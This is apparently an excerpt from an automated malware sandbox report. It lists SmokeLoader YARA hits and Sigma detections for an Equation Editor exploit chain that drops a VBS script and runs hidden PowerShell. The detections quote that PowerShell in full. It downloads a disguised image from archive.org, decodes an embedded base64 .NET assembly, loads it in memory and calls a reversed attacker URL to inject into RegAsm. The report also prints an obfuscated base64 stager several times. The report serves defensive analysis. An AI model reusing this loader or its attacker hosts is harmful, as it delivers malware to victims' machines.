        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        7.2.powershell.exe.2878da8.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          10.2.RegAsm.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security

            Sigma Signatures

            Exploits

            barindex
            Sigma detected: EQNEDT32.EXE connecting to internet
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 23.94.148.16, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3312, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
            Sigma detected: File Dropped By EQNEDT32EXE
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3312, TargetFilename: C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs

            System Summary

            barindex
            Sigma detected: Base64 Encoded PowerShell Command Detected
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
            Sigma detected: Equation Editor Network Connection
            Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3312, Protocol: tcp, SourceIp: 23.94.148.16, SourceIsIpv6: false, SourcePort: 80
            Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8
            Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
            Sigma detected: Suspicious Microsoft Office Child Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3312, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , ProcessId: 3472, ProcessName: wscript.exe
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3312, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , ProcessId: 3472, ProcessName: wscript.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
            Sigma detected: Execution of Suspicious File Type Extension
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\gwseuha, CommandLine: C:\Users\user\AppData\Roaming\gwseuha, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\gwseuha, NewProcessName: C:\Users\user\AppData\Roaming\gwseuha, OriginalFileName: C:\Users\user\AppData\Roaming\gwseuha, ParentCommandLine: taskeng.exe {B5E7D6C9-0A45-4095-9C68-D1725C8390DE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1], ParentImage: C:\Windows\System32\taskeng.exe, ParentProcessId: 3988, ParentProcessName: taskeng.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\gwseuha, ProcessId: 4020, ProcessName: gwseuha
            Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? 